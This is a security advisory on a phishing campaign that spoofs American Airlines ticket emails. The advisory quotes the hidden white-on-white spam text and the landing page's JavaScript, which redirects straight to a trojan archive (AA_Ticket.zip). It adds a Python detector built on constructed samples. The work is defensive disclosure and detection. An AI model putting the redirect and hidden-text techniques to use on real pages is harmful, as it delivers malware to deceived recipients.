Email from American Airlines with image leads to malicious payload


MX Lab, http://www.mxlab.eu, started to intercept a few samples of a new trojan distribution campaign by email with the subject “Please download your ticket #NR4692” or “Please download your ticket #1881” (the ticket number varies from email to email).

The email is sent from the spoofed address “American Airlines <message-nr86760@aa.com>” and has an embedded image with instructions to print your flight ticket.

This is a typical example of the technique used in image-based spam in the past: the visible content is an image, while the body also contains three paragraphs of text kept hidden from the reader (white text on a white background).

<p style="color: rgb(255, 255, 255);">Youl aske me why I rather choose to haue A weight
of carrion flesh, then to receiue Three thousand DucatsIle not answer that But say it
is my humor; Is it answered What if my house be troubled with a Rat, And I be pleasd to
giue ten thousand Ducates To haue it baind What, are you answerd yet Some men there are
loue not a gaping Pigge Some that are mad, if they behold a Cat And others, when the
bag-pipe sings ith nose, Cannot containe their Vrine for affection. Masters of passion
swayes it to the moode Of what it likes or loaths, now for your answer As there is no
firme reason to be rendred Why he cannot abide a gaping Pigge Why he a harmlesse
necessarie Cat Why he a woollen bag-pipe but of force Must yeeld to such ineuitable
shame, As to offend himselfe being offended So can I giue no reason, nor I will not,
More then a lodgd hate, and a certaine loathing I beare Anthonio, that I follow thus
A loosing suite against him Are you answered Bass. 
</p>

The URL behind the image leads to hxxp://www.thepilatesstudio.ca/VZGTLYJTVT.htm and this site contains the following HTML code:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<meta content="text/html; charset=Windows-1251" http-equiv="content-type">
<title>redir</title>

</head>
<body>

<script language="JavaScript">
<!--
window.location="AA_Ticket.zip";
//-->
</script>
</body>
</html>

The JavaScript redirects the browser to AA_Ticket.zip as soon as the page loads, so simply following the link behind the image triggers the download of the malicious payload.
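Both indicators described above (hidden white-on-white paragraphs in the email body and a landing page whose only purpose is a script redirect to an archive) are easy to flag automatically in mail-gateway or URL-sandbox triage. The following Python script is an added example written for this post, not code from MX Lab; it uses only the standard library, and the two sample HTML documents inside it are constructed to resemble the campaign rather than being the real message.

```python
import re
from html.parser import HTMLParser

# Constructed sample input, modelled on the campaign described above (not the real email).
SAMPLE_EMAIL = """<html><body>
<img src="http://example.invalid/ticket.gif" alt="print your ticket">
<p style="color: rgb(255, 255, 255);">Youl aske me why I rather choose to haue A weight of carrion flesh</p>
<p>Thank you for flying with us.</p>
</body></html>"""

# Constructed landing page, modelled on the "redir" page quoted above.
SAMPLE_LANDING = """<html><head><title>redir</title></head><body>
<script language="JavaScript">
<!--
window.location="AA_Ticket.zip";
//-->
</script>
</body></html>"""

# Colour values that vanish on the default white background of most mail clients.
WHITE_VALUES = {"#fff", "#ffffff", "white", "rgb(255,255,255)"}
# Void elements never get an end tag, so they must not affect nesting depth.
VOID_TAGS = {"img", "br", "hr", "meta", "link", "input"}
# Direct assignments and the replace()/assign() forms of a script redirect.
REDIRECT_RE = re.compile(
    r"""(?:window|document|top|self)?\.?location(?:\.href)?\s*"""
    r"""(?:=|\.replace\(|\.assign\()\s*['"]([^'"]+)['"]""", re.I)
# Extensions that should never be the target of a bare page-load redirect.
PAYLOAD_EXT = (".zip", ".exe", ".scr", ".rar", ".jar", ".js")


def _style_hides_text(style):
    """True if an inline style makes the text invisible to the reader."""
    decls = {}
    for part in style.split(";"):
        if ":" in part:
            key, value = part.split(":", 1)
            decls[key.strip().lower()] = value.strip().lower()
    if decls.get("color", "").replace(" ", "") in WHITE_VALUES:
        return True
    if decls.get("display") == "none" or decls.get("visibility") == "hidden":
        return True
    return decls.get("font-size", "") in {"0", "0px", "0pt", "0em"}


class _Scanner(HTMLParser):
    """Collects text inside hidden elements and the bodies of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = 0      # nesting depth while inside a hidden element
        self.hidden_chunks = []
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style") or ""
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
        elif tag in VOID_TAGS:
            return
        elif self.hidden_depth:
            self.hidden_depth += 1        # child of an already hidden element
        elif _style_hides_text(style):
            self.hidden_depth = 1

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        elif tag not in VOID_TAGS and self.hidden_depth:
            self.hidden_depth -= 1

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data      # HTMLParser hands script bodies over as raw data
        elif self.hidden_depth and data.strip():
            self.hidden_chunks.append(data.strip())


def scan_html(html):
    """Return the hidden-text and redirect indicators found in one HTML document."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    redirects = [m.group(1) for body in scanner.scripts for m in REDIRECT_RE.finditer(body)]
    return {
        "hidden_text": scanner.hidden_chunks,
        "redirects": redirects,
        "payload_redirects": [r for r in redirects if r.lower().endswith(PAYLOAD_EXT)],
    }


if __name__ == "__main__":
    for name, doc in (("email", SAMPLE_EMAIL), ("landing page", SAMPLE_LANDING)):
        print(name, scan_html(doc))
```

Run against the constructed email, `scan_html` returns the hidden Shakespeare fragment and no redirects; run against the constructed landing page it returns `AA_Ticket.zip` under both `redirects` and `payload_redirects`, which is the combination worth alerting on: a page with no visible content whose script sends the visitor straight to an archive.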

The downloaded AA_Ticket.zip contains AA_Ticket.exe.

The trojan is known as W32/Zortob.AA!tr, Mal/EncPk-AED, Posible_Worm32 or PAK_Generic.001.

At the time of writing, only 6 of the 41 AV engines at Virus Total detected the trojan.

Virus Total permalink and SHA256: d1af9462258ace66c58d6d9029cb3d2992ed31eb7365874b9135a85199f6554e.